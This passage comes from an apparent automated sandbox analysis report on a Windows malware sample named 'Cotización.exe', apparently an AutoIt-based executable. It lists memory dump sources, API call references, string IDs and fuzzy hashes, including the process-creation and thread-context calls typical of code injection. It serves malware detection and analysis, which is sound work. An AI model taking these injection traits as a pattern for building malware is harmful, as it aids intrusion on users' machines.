                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorLast
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 2487901850-572801152
                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                APIs
                  • Part of subcall function 0406BEE0: Sleep.KERNELBASE(000001F4), ref: 0406BEF1
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0406C0DE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateFileSleep
                • String ID: IJKF2NG9W4
                • API String ID: 2694422964-3472069198
                • Opcode ID: 60ea8927843377ea77af49227d26ecb15ae45ebb3fde18d940b3ea101d595275
                • Instruction ID: 1569ccbc9be360b7e7c363964d5d7062e19c81641583d233e850122a5a43d0dd
                • Opcode Fuzzy Hash: 60ea8927843377ea77af49227d26ecb15ae45ebb3fde18d940b3ea101d595275
                • Instruction Fuzzy Hash: CD518271E04359EAEF10DBA4C814BEEBB78AF45304F004199E61ABB2C0DA755B45CBA5
                APIs
                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcsncpy.LIBCMT ref: 00401C41
                • _wcscpy.LIBCMT ref: 00401C5D
                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                • String ID: Line:
                • API String ID: 1874344091-1585850449
                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                APIs
                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 1607946009-824357125
                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: ou
                • API String ID: 0-3837949563
                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process$CurrentTerminate
                • String ID: ou
                • API String ID: 2429186680-3837949563
                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 0406B69B
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0406B731
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0406B753
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                • Instruction ID: 7c42152c7608f7ea8fb9d421862be44f18417491e038cd4dc3310fb3798403ce
                • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                • Instruction Fuzzy Hash: DE62EE70A14258DBEB24DFA4C850BDEB376EF58304F1091A9D10EFB290E779AE81CB55
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                APIs
                • VariantInit.OLEAUT32(?), ref: 0047950F
                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                • VariantClear.OLEAUT32(?), ref: 00479650
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$AllocClearCopyInitString
                • String ID:
                • API String ID: 2808897238-0
                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                APIs
                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                • _free.LIBCMT ref: 004295A0
                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Cotizaci#U00f3n.exe
                • API String ID: 3938964917-1820844195
                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: Error:
                • API String ID: 4104443479-232661952
                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,0040F545,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,004A90E8,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                • String ID: X$pWH
                • API String ID: 85490731-941433119
                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                APIs
                • _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 00401B57
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                • String ID: @EXITCODE
                • API String ID: 2734553683-3436989551
                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                Strings
                • C:\Users\user\Desktop\Cotizaci#U00f3n.exe, xrefs: 00410107
                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _strcat
                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Cotizaci#U00f3n.exe
                • API String ID: 1765576173-1620667976
                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                • String ID:
                • API String ID: 1794320848-0
                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                APIs
                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: IconNotifyShell_
                • String ID:
                • API String ID: 1144537725-0
                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                APIs
                • _malloc.LIBCMT ref: 0043214B
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _malloc.LIBCMT ref: 0043215D
                • _malloc.LIBCMT ref: 0043216F
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _malloc$AllocateHeap
                • String ID:
                • API String ID: 680241177-0
                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
